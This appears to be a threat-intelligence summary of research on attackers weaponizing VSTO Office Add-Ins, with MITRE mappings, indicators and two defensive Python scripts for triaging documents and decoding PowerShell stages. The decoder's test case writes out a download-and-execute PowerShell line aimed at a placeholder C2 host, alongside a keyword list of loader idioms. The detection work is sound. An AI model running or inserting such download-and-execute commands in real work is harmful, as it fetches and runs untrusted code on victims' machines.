No Macro? No Worries. VSTO Being Weaponized by Threat Actors | Deep Instinct

VSTO Add-Ins can be weaponized to deliver and execute code via Office documents without any VBA macro, and an Add-In the user has once trusted is loaded again on every subsequent open, giving persistence across Office sessions. The article details local and remote VSTO attack flows, including the user prompt to enable the Add-In, encoded and compressed PowerShell payloads, and a remote third-stage download from a C2 server. hashtags: #Eventos_CDG_1Maio #DanielSchell #PowerShell #VSTO

Keypoints

  • VSTO Add-Ins can be delivered with Office documents (local VSTO) or fetched remotely (remote VSTO) to execute code.
  • VSTO is a less common vector than VBA macros and is increasingly explored because it does not rely on macros at all, so macro-focused controls and detections do not cover it and some detections are evaded.
  • VSTO-bearing files can be spotted from docProps/custom.xml inside the OOXML package, which carries the _AssemblyLocation (path or URL of the customization manifest) and _AssemblyName custom properties that Office uses to find and load the Add-In.
  • Local VSTO payloads store the DLL and dependencies alongside the document, often in containers like ISO files.
  • Attack flow includes a Word document prompting the user to enable the Add-In (e.g., Eventos_CDG_1Maio.docx).
  • The Add-In payload decodes and executes a PowerShell snippet to reach a C2 server for a second stage.
  • Remote VSTO can download a password-protected ZIP, extract it into the user's local AppData folder (%LOCALAPPDATA%), and run a file named conhost.exe shipped inside the archive (not the Windows binary of that name) as a third-stage payload (sample-dependent).
  • A proof-of-concept explores multiple attack scenarios using VSTO, highlighting potential real-world abuses.
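The custom.xml indicator from the keypoints above, turned into a triage check. This is an added example written for this page, not code from Deep Instinct or the article: it opens a .docx as the ZIP container it is, reads docProps/custom.xml, and classifies the document as local or remote VSTO from the _AssemblyLocation value. The sample documents it builds are constructed in memory (a minimal container with only the parts the check needs); the manifest names and the example hostname are hypothetical.

```python
import io
import zipfile
import xml.etree.ElementTree as ET
from urllib.parse import urlparse
from xml.sax.saxutils import escape

# Namespaces used by docProps/custom.xml in an OOXML package.
CUSTOM_NS = "http://schemas.openxmlformats.org/officeDocument/2006/custom-properties"
VT_NS = "http://schemas.openxmlformats.org/officeDocument/2006/docPropsVTypes"
# Custom properties Office writes for a document-level VSTO customization.
VSTO_PROPS = ("_AssemblyLocation", "_AssemblyName")


def custom_properties(doc_bytes: bytes) -> dict:
    """Return {name: value} for every property in docProps/custom.xml ({} if the part is absent)."""
    if not zipfile.is_zipfile(io.BytesIO(doc_bytes)):
        return {}
    with zipfile.ZipFile(io.BytesIO(doc_bytes)) as z:
        if "docProps/custom.xml" not in z.namelist():
            return {}
        root = ET.fromstring(z.read("docProps/custom.xml"))
    props = {}
    for prop in root.iter(f"{{{CUSTOM_NS}}}property"):
        # The value sits in a typed child element such as <vt:lpwstr>.
        props[prop.get("name")] = "".join(child.text or "" for child in prop)
    return props


def vsto_indicators(doc_bytes: bytes) -> dict:
    """Flag a VSTO-bearing document and classify it as local or remote from _AssemblyLocation."""
    props = custom_properties(doc_bytes)
    found = {k: props[k] for k in VSTO_PROPS if k in props}
    if "_AssemblyLocation" not in found:
        return {"vsto": False}
    # The manifest location comes first; any '|'-separated trailer (e.g. 'vstolocal') is dropped.
    manifest = found["_AssemblyLocation"].split("|", 1)[0]
    scheme = urlparse(manifest).scheme.lower()
    # http/https means the manifest (and thus the DLL) is fetched from a server: remote VSTO.
    # file:///, drive letters and bare relative names point next to the document: local VSTO.
    kind = "remote" if scheme in ("http", "https") else "local"
    return {"vsto": True, "kind": kind, "manifest": manifest, "properties": found}


def build_sample_docx(assembly_location=None) -> bytes:
    """Constructed minimal OOXML container for testing, not a real sample.

    With assembly_location=None no custom.xml is written (benign control document).
    """
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as z:
        z.writestr("[Content_Types].xml",
                   "<Types xmlns='http://schemas.openxmlformats.org/package/2006/content-types'/>")
        if assembly_location is not None:
            fmtid = "{D5CDD505-2E9C-101B-9397-08002B2CF9AE}"
            z.writestr("docProps/custom.xml",
                       f'<?xml version="1.0" encoding="UTF-8" standalone="yes"?>'
                       f'<Properties xmlns="{CUSTOM_NS}" xmlns:vt="{VT_NS}">'
                       f'<property fmtid="{fmtid}" pid="2" name="_AssemblyLocation">'
                       f'<vt:lpwstr>{escape(assembly_location)}</vt:lpwstr></property>'
                       f'<property fmtid="{fmtid}" pid="3" name="_AssemblyName">'
                       f'<vt:lpwstr>*</vt:lpwstr></property>'
                       f'</Properties>')
    return buf.getvalue()


if __name__ == "__main__":
    # Hypothetical locations: a local VSTO shipped beside the document, a remote one, and a benign file.
    for loc in ("Eventos_CDG_1Maio.vsto|vstolocal", "https://addins.example.invalid/Eventos.vsto", None):
        print(loc, "->", vsto_indicators(build_sample_docx(loc)))
```

Run it against a real document with `vsto_indicators(open(path, "rb").read())`. A remote classification is the higher-priority alert: the manifest URL is the host the victim's Office will contact, and it belongs in the same place as the C2 indicators.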

MITRE Techniques

  • [T1204] User Execution – The Word document prompts the user to enable an Add-In, triggering execution. Quote: ‘Word document (“Eventos_CDG_1Maio.docx”) prompts the user to allow “Add-In” installation.’
  • [T1059.001] PowerShell – The Add-In payload executes an encoded and compressed PowerShell snippet to reach the next stage. Quote: ‘encoded and compressed PowerShell snippet:’
  • [T1027] Obfuscated Files or Information – The payload uses encoding and compression to conceal the PowerShell code. Quote: ‘encoded and compressed PowerShell snippet’
  • [T1105] Ingress Tool Transfer – The attacker downloads a password-protected ZIP, extracts it into the user's local AppData folder, and executes a conhost.exe shipped inside the archive. Quote: ‘download a password protected .ZIP archive, extract it in the user’s %AppDataLocal folder, and execute a contained “conhost.exe” file.’
  • [T1553.002] Subvert Trust Controls: Code Signing – Remote VSTO relies on a trusted publisher certificate to get past the trust prompts and checks that would otherwise block the Add-In. Quote: ‘bypassing trust-related security mechanisms using a trusted publisher certificate’
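The T1059.001 and T1027 entries above describe an encoded and compressed PowerShell snippet. The decoder below is an added example for analysts, not code from the article or from the Add-In: it unwinds the layers such loaders commonly stack (Base64 over gzip, raw DEFLATE as produced by .NET's DeflateStream, zlib, or a bare UTF-16LE -EncodedCommand string) and then scans the plaintext for download-and-execute idioms. The stage it encodes and decodes is a constructed, benign stand-in pointing at a placeholder host; the marker list is a generic assumption, not indicators taken from the sample.

```python
import base64
import gzip
import re
import zlib

# Generic loader idioms worth flagging in a decoded stage (assumption, not from the sample).
SUSPICIOUS = ("IEX", "Invoke-Expression", "DownloadString", "DownloadFile", "Net.WebClient",
              "Invoke-WebRequest", "FromBase64String", "-EncodedCommand", "Expand-Archive")


def _decompress(blob: bytes) -> bytes:
    """Undo the containers PowerShell loaders commonly use: gzip, raw DEFLATE (DeflateStream), zlib.

    Returns the input unchanged when none of them applies (e.g. a plain -EncodedCommand string).
    """
    if blob[:2] == b"\x1f\x8b":
        return gzip.decompress(blob)
    for wbits in (-zlib.MAX_WBITS, zlib.MAX_WBITS):  # raw DEFLATE first, then zlib-wrapped
        try:
            return zlib.decompress(blob, wbits)
        except zlib.error:
            continue
    return blob


def decode_powershell_stage(encoded: str) -> str:
    """Base64-decode, decompress and text-decode an encoded PowerShell snippet."""
    data = _decompress(base64.b64decode(encoded))
    # powershell -EncodedCommand takes UTF-16LE; ASCII text then has a NUL in every second byte.
    if len(data) >= 2 and data[1] == 0:
        return data.decode("utf-16-le")
    return data.decode("utf-8", errors="replace")


def suspicious_tokens(script: str) -> list:
    """Case-insensitive scan of a decoded stage; returns the markers that were hit, in list order."""
    return [m for m in SUSPICIOUS if re.search(re.escape(m), script, re.IGNORECASE)]


def encode_like_loader(script: str, method: str) -> str:
    """Constructed stand-in for a loader's encoding step so the decoder can be exercised offline."""
    if method == "gzip":
        return base64.b64encode(gzip.compress(script.encode())).decode()
    if method == "deflate":
        c = zlib.compressobj(wbits=-zlib.MAX_WBITS)  # raw DEFLATE, like .NET DeflateStream
        return base64.b64encode(c.compress(script.encode()) + c.flush()).decode()
    if method == "utf16":
        return base64.b64encode(script.encode("utf-16-le")).decode()
    raise ValueError(f"unknown method {method}")


if __name__ == "__main__":
    # Constructed benign stage with a placeholder host; not the snippet from the sample.
    stage = "IEX (New-Object Net.WebClient).DownloadString('http://c2.example.invalid/stage2')"
    for method in ("gzip", "deflate", "utf16"):
        decoded = decode_powershell_stage(encode_like_loader(stage, method))
        print(method, decoded == stage, suspicious_tokens(decoded))
```

When the Add-In DLL is on hand, the Base64 blob is usually a string literal in the managed code; paste it into `decode_powershell_stage` and the plaintext gives the C2 host for the second stage, which is the indicator that matters most for hunting.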

Indicators of Compromise

  • [File Name] VSTO-related payload and components – Eventos_CDG_1Maio.docx, Eventos_CDG_1Maio.dll

Read more: https://www.deepinstinct.com/blog/no-macro-no-worries-vsto-being-weaponized-by-threat-actors